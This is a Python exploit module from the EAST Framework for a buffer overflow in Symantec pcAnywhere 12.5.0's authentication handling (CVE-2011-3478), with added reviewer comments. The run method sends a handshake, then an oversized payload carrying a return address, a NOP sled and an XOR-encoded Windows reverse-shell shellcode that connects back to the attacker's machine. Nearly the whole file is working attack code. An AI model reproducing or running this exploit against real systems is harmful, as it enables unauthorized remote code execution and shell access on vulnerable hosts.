#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import time
import socket
import struct
sys.path.append("./core")
sys.path.append("./shellcodes")
from Sploit import Sploit
from shellcodes.Shellcodes import OSShellcodes
# Module descriptor and user options for this EAST framework exploit module.
# INFO is metadata only; OPTIONS is what Sploit.args() resolves at run time
# (HOST/PORT are kept as strings here — PORT is int()-converted in args()).
INFO = {
    'NAME': "ef_symantec_pcanywhere_host_rce",
    'DESCRIPTION': "Symantec pcAnywhere 12.5.0 - Remote Command Execution",
    'VENDOR': "https://www.symantec.com/",
    'DOWNLOAD_LINK': 'http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe',
    'LINKS': 'https://www.exploit-db.com/exploits/38599/',
    "CVE Name": "2011-3478",
    "NOTES": """
The application's module used for handling incoming connections (awhost32.exe) contains a flaw. When handling authentication requests, the vulnerable process copies user provided input to a fixed length buffer without performing a length check.
Tested against Symantec pcAnywhere 12.5.0, WinXP Sp2 Eng and WinXP Sp3 Eng.
""",
    'CHANGELOG': "12 Nov, 2015. Written by Gleg team.",
    'PATH': 'Exploits/General/',
}

OPTIONS = {
    "HOST": "127.0.0.1",
    "PORT": "5631",
    # The selected TARGET string is inspected by exploit.args() (substring
    # test for '3') to pick the per-service-pack address.
    "TARGET": {
        "options": ["Wnd XP Sp2", "Wnd XP Sp3"],
        "selected": "Wnd XP Sp2",
    },
}
class exploit(Sploit):
    """EAST framework exploit module for the pcAnywhere host service.

    Module metadata (name, CVE, tested targets) is in the module-level INFO
    dict and the user-facing options (HOST, PORT, TARGET) in OPTIONS.
    This file is Python 2 only: it uses print statements and relies on str
    being a byte string when the payload is concatenated in run().

    NOTE(review): this copy of the file has lost its indentation; the block
    nesting below is reconstructed from the statement order.
    """
    def __init__(self, host = "", port = 0, logger = None):
        # host/port defaults are placeholders; args() normally overrides them
        # from the framework option set.
        Sploit.__init__(self, logger = logger)
        self.name = INFO['NAME']
        self.host = host
        self.port = port
        # Target-dependent address. This default belongs to "Wnd XP Sp2";
        # args() replaces it with the Sp3 value when that target is selected.
        self.addr = 0x24455CA
        # Assigned here but never read within this class — presumably
        # consumed by the Sploit base class or framework UI.
        self.state = "running"
        return
    def args(self):
        """Resolve HOST, PORT and TARGET from the framework option set.

        NOTE(review): this rebinds self.args from the bound method to the
        dict returned by Sploit.args(). create_shellcode() depends on that
        dict, and run() calls self.args() first — so run() cannot be invoked
        twice on one instance (the second self.args() call would hit a dict).
        """
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        # PORT arrives as a string (OPTIONS["PORT"] is "5631"); ValueError if
        # the user supplies a non-numeric value.
        self.port = int(self.args.get('PORT', self.port))
        target = self.args.get('TARGET', "Wnd XP Sp2")
        # Substring test, not an equality test: any target string containing
        # '3' (i.e. "Wnd XP Sp3" from OPTIONS) selects the Sp3 address.
        if '3' in target:
            self.addr = 0x27155CA
        return
    def chk(self):
        """Connectivity check: return 0 if a TCP connect to host:port
        succeeds, 1 otherwise. No protocol-level probing is done.

        NOTE(review): the bare except also swallows KeyboardInterrupt and
        SystemExit, and the socket opened on the success path is never
        closed (no close() in this method).
        """
        try:
            client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client.connect((self.host, self.port))
        except:
            self.log("check reported no open socket")
            return 1
        self.log("check reported that service is steel alive")
        return 0
    def create_shellcode(self):
        """Build the reverse-connect payload through OSShellcodes and return it.

        Callback port: args['listener']['PORT'] when a listener is configured,
        else 4000. Callback host: this machine's address as resolved from its
        own hostname (socket.gethostbyname(socket.gethostname())).

        NOTE(review): self.args['listener'] is indexed unconditionally, so a
        KeyError results if Sploit.args() does not supply a 'listener' key —
        confirm against the base class. The trailing ["\\x00"] argument's
        meaning is defined by OSShellcodes, which is not visible here.
        """
        self.log("Generate shellcode started")
        port = 4000
        if self.args['listener']:
            port = int(self.args['listener']['PORT'])
        self.CONNECTBACK_PORT = port
        # os_system is assigned but never used; only os_target is passed on.
        os_system = os_target = "WINDOWS"
        os_arch = '32bit'
        shellcode_type = 'reverse'
        s = OSShellcodes(os_target, os_arch, socket.gethostbyname(socket.gethostname()), self.CONNECTBACK_PORT, ["\x00"])
        shellcode = s.create_shellcode(
            shellcode_type,
            encode='xor',
            debug=1
        )
        self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch))
        self.log("Length of shellcode: %d" % len(shellcode))
        self.log("Generate shellcode finished")
        return shellcode
    def run(self):
        """Framework entry point: resolve options, build the payload and
        deliver it over one TCP session to host:port.

        Returns 1 after the send path completes (success is reported to the
        framework via finish(True)) and 0 if anything raised. The bare
        except hides the actual exception — only "failed!" is logged — so
        a failure in create_shellcode(), name resolution or the socket calls
        is indistinguishable from a network error.

        NOTE(review): as nested here, a refused connection (connect_ex != 0)
        skips the send block but still reaches finish(True) and returns 1;
        confirm the intended nesting against the original file.
        """
        self.args()
        self.log("Attacking {}".format(self.host))
        try:
            shellcode = self.create_shellcode()
            s = socket.socket()
            if s.connect_ex((self.host, self.port)) == 0:
                # Fixed handshake, then a constant 100-byte username; the raw
                # server replies are printed (Python 2 print statement). These
                # constant fields are what a network signature would key on.
                s.sendall('\x00\x00\x00\x00') #init
                print s.recv(8192)
                s.sendall('\x0D\x06\xFE')
                time.sleep(1)
                print s.recv(8192)
                s.sendall('A' * 100) #send username
                time.sleep(1)
                # Logged in decimal, not hex.
                self.log('Exploit address: ' + str(self.addr))
                # Oversized authentication field (see INFO['NOTES']): the
                # shellcode is 'B'-padded so that part is always 1270 bytes.
                # Python 2 str concatenation — under Python 3 struct.pack()
                # returns bytes and this line would raise TypeError.
                data = struct.pack('<L', self.addr) + 'AAAA' + struct.pack('<L', self.addr + 16) + '\x90\x90\x90\x90' + shellcode + 'B' * (1270 - len(shellcode))
                data += struct.pack('<L', self.addr)
                s.sendall(data)
                # Fixed wait; nothing is read back to confirm the outcome.
                time.sleep(5)
                self.log('Waiting for callback connction')
                s.close()
            self.finish(True)
            return 1
        except:
            self.log("failed!")
            self.finish(False)
            return 0
if __name__ == '__main__':
    # Tool mode only for now; a standalone mode was planned by the author.
    # The port given here (80) is a placeholder — args() overrides it from
    # OPTIONS when run() starts.
    print("Running exploit %s .. " % INFO['NAME'])
    exploit('', 80).run()